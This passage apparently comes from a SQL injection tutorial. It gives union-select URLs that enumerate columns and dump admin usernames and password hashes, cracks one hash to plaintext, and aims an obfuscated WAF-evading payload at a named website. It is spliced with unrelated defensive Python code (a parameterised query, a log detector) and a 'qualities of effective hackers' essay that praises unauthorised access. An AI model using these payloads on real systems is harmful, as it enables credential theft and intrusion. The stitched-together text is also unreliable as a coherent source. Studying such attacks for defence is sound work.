http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
There is a repeating element, which in this case is 'id'. From it, we come to know which table number has which columns.
Step 7: Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in the first table, that is tar_admin. "0x3a" is used simply to insert a colon in the result to separate the values; it is the hex of a colon.
http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--
So finally we got the usernames and passwords on screen. But the passwords are encrypted. Mostly these encryptions are crackable. Let's choose any username, say "Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15.
Let's go to http://md5crack.com/crackmd5.php or http://www.md5decrypter.co.uk and put the hashed (encrypted) password there, and it would crack it for us. We got 'oorwullie' in the result (the password in clear text).
Note: Hashes are a type of encryption which is irreversible. There are numberless online crackers available. Keep trying.
Sometimes very strong hashes cannot be cracked.
Login page of website: So you got the key, where is the lock now? Most websites have login pages at default locations. Take any website, say www.xyz.com. The login page would be at www.xyz.com/admin, www.xyz.com/administrator, www.xyz.com/adminlogin etc. Download this admin page finder
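Every step above works because news.php pastes the id value straight into the SQL text. The sketch below is an added example, not code from the original tutorial: it uses Python's sqlite3 as a stand-in for PHP/MySQL, with a constructed six-column news table, a constructed tar_admin row and hypothetical function names, to show the concatenated query beside a validated, parameterised one.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: a 6-column news table plus the tar_admin table.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                           author TEXT, created TEXT, category TEXT);
        CREATE TABLE tar_admin (username TEXT, password TEXT);
        INSERT INTO news VALUES (130, 'Title', 'Body', 'editor', '2024-01-01', 'general');
        INSERT INTO tar_admin VALUES ('sample_admin', 'sample_hash_value');
    """)
    return db

def news_vulnerable(db, raw_id):
    # "Before": the parameter is concatenated into the SQL text, so everything
    # after the number (ORDER BY, UNION SELECT, comments) is parsed as SQL.
    return db.execute("SELECT * FROM news WHERE id=" + raw_id).fetchall()

def news_hardened(db, raw_id):
    # Allow-list check: reject anything that is not a plain decimal integer.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be an integer")
    # Bound parameter: the value travels as data and is never parsed as SQL.
    return db.execute("SELECT * FROM news WHERE id=?", (int(raw_id),)).fetchall()

def try_query(handler, raw_id):
    """Run one request against a fresh sample database and classify the outcome."""
    db = make_db()
    try:
        return ("rows", handler(db, raw_id))
    except sqlite3.Error:
        # The error/no-error difference is exactly what steps 1 and 2 observe;
        # a production handler should log it and return a generic page.
        return ("sql-error", None)
    except ValueError:
        return ("rejected", None)

# Inputs taken from the steps above, adapted to the constructed tables.
PROBE_TOO_MANY = "130 order by 7--"
PROBE_EXACT = "130 order by 6--"
UNION_READ = "-130 union select all 1,username,3,4,5,6 from tar_admin--"
```

With news_vulnerable the three inputs yield an SQL error, a normal row and a row read from tar_admin; with news_hardened all three are rejected before any SQL is built.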
Example of Injection 
www.bitaraf.com
http://www.bitaraf.com/showlink.php?id=.1244923%injecthere   (vulnerable )


http://www.bitaraf.com/showlink.php?id=.1244923+%2F%2A%2150000UnIOn%2A%2F+SeLEct+1%2Cconcat%280x3c2f7469746c653e3c666f6e7420636f6c6f723d7265643e4164657368206861786f723c62723e%2Cuser%28%29%2C0x3c62723e%2Cversion%28%29%2C0x3c62723e%2Cdatabase%28%29%2C0x3c62723e%2Cmake_set%286%2C%40%3A%3D0x0a%2C%28select%281%29from%28information_schema.columns%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2Ctable_name%2Ccolumn_name%29%29%2C%40%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--+
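The request above hides UNION inside a MySQL versioned comment (/*!50000 ... */), mixes letter case and URL-encodes the result, which defeats naive string matching in web logs. As an added example (not from the original post), this detector normalises request targets before matching the stages of the walkthrough; the log lines, IP addresses, paths and stage names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One signature per stage of the walkthrough (steps 2 to 7).
STAGES = [
    ("column-count probe", re.compile(r"\border by \d+")),
    ("union select", re.compile(r"\bunion (all )?select\b")),
    ("version fingerprint", re.compile(r"@@version|\bversion ?\(")),
    ("schema enumeration", re.compile(r"\binformation_schema\b")),
    ("bulk extraction", re.compile(r"\b(group_concat|make_set) ?\(")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (.+?) HTTP/[\d.]+"')

def normalise(raw):
    """Decode and flatten a query string so signatures see what MySQL would parse."""
    text = raw
    for _ in range(3):                      # undo up to three layers of URL encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    # /*!50000 ... */ is a MySQL versioned comment: its body is executed, so keep it.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)   # ordinary comments act as spaces
    return re.sub(r"\s+", " ", text).lower()

def stages_in(target):
    query = normalise(target.partition("?")[2])
    return [name for name, rx in STAGES if rx.search(query)]

def scan(log_lines):  # -> {client_ip: [stage, ...]} in first-seen order
    hits = {}
    for line in log_lines:
        m = REQUEST.match(line)
        for stage in (stages_in(m.group(2)) if m else []):
            seen = hits.setdefault(m.group(1), [])
            if stage not in seen:
                seen.append(stage)
    return hits

# Constructed access-log lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news/news.php?id=130 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news/news.php?id=130%20order%20by%2010-- HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /news/news.php?id=-130+union+select+all+1,@@version,3,4,5,6-- HTTP/1.1" 200 5200',
    '203.0.113.9 - - [01/Jan/2024:10:00:15 +0000] "GET /news/news.php?id=-130+union+select+all+1,group_concat(table_name),3,4,5,6+from+information_schema.tables-- HTTP/1.1" 200 6100',
    '192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /showlink.php?id=1+%2F%2A%2150000UnIOn%2A%2F+SeLEct+1%2C2--+ HTTP/1.1" 200 900',
]
```

A single client moving from the column-count probe to schema enumeration within seconds, as 203.0.113.9 does in the sample, is a stronger signal than any one keyword on its own.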

ADMIN PANEL

7 Qualities of Highly Effective Hackers

When asked to write on this topic, I admit that it made me cringe just a bit, because I don't consider myself to be a highly effective hacker. I find myself as a noob everywhere that I'm trying to learn new things, or I am frustrated with the most ridiculous "hacker" material on the web, written by school-taught programmers that follow step by step instructions out of a manual that everyone has already read. Then I thought to myself.. "That's it!" That is Number One!

Quality One- Always A N00b


Yea. You heard it, and it sounds crazy, but do you ever wonder why on the forums and comments you always see the trolls calling the weakest link a noob and picking on them.. and then THEY are revealed to be newbies also? Well guess what? I am ALWAYS in over my head, trying to learn things that are too much for me. When I go through phases where I only visit sites and forums where I am already adept at the subject or skill level at hand, I find that not only have months gone by without me learning anything new, I have also gotten rusty at things I was beginning to learn.

So as crazy as it sounds, I believe that a highly effective hacker is always in places where he is a noob. Always learning things he had no idea of and constantly finding things that overwhelm his mind, until a week later when he is now teaching others how to do it and busy with something else he doesn't yet understand. This is the way of intellectual progress. When you see guys on these forums and blog comments, picking on newbies and boasting the same skills with nothing new, know that they are at their peak. Their time has come and gone because they have settled for what they know and are satisfied with it in an ever evolving and changing world of technology.

Quality Two- Curiosity

Do you think for a moment that the l33t ones out there, finding new exploits and breaking into systems are just following step by step guides or motivated by their job or a pay check? If so, I am sorry to rain on your parade, but an effective hacker has an obsessive curiosity. 

These personal drives will bring a person farther in skill than the need for a promotion or recognition will. "I wonder what would happen if I tried to.." "What do you suppose they keep in here.." "OMG! What if I trick it into running this as a..." These are the basic thought patterns of an effective hacker. Not just when he has a job to do. I mean always. For example, when you as a kid (or even now) played a video game and found a weird glitch (not necessarily a 'cheat') that you thought was funny. "Oh wow. If I walk in this corner backward he kinda gets stuck there.. UPSIDE DOWN! LOL", "What would happen if I do that and try to jump at the same time? Oh weird! It drops my character where I'm not even supposed to be yet!". OK, this is the curiosity that intrigues an effective hacker. He wants to make things work in ways they were not originally intended to.

Quality Three- Enjoys being places he doesn't belong

Hey sorry all you white-hats out there, but it's true. I won't condone trespassing, but many of the most effective hackers get serious pleasure out of being places they do not belong. I once read that everything that drives a man is a form of penetration, of inserting what he feels is himself into something he feels is not himself. I don't know about all that, but some of these guys get pleasure in the same way that a voyeur enjoys watching what he is not allowed to. They enjoy getting into places they are not supposed to be. Now I am not encouraging this behaviour, just laying out the facts. The reason these people find ways to get into things is because these fundamental, basic drives compel them to. It closes the gap of all the things he must learn in order to achieve what he wants.

Quality Four- An unbalanced lifestyle

I often find myself engrossed in a project (not just computer related) and nothing else exists. If you ever see these skinny or fat guys beating at their computer at 3 in the morning with empty coke cans and full ashtrays all around until they finally call it a day.. and then it's time to go back in to work. That's them. LOL. Now I am not saying that being an effective hacker means they do not have a life (though some may not). A lot of very successful people get obsessed with what they are working on and do nothing but that.. For a while. Then they go through a phase where they are obsessed with something different.

Quality Five- Likes to break things

Come on guys! We're hackers! We love to smash things apart and see what happens. Because face it, it's much easier to break something than to make it and it rewards a valuable opportunity to put it back together in a different way.

Quality Six- Well Organized

In the beginning, it's ok to have files, folders, projects, and programs littered amongst temporary directories, hard drives and OS's. But eventually that's going to be a huge problem. The most efficient hackers have definitely learned to become very well organized multitaskers. You'll see various windows and terminals open, separate directories for everything that are well categorized, and a task manager changing process priorities as he's bouncing from one project to the other across his screen.

Quality Seven- Everything is Insecure until... Never.

The most efficient hackers know that all software, hardware, and access controls are man made and riddled with flaws, predictabilities, and unpredictabilities, a reflection of the creators. People. Nothing can ever be completely trusted, just as no person can be completely trusted.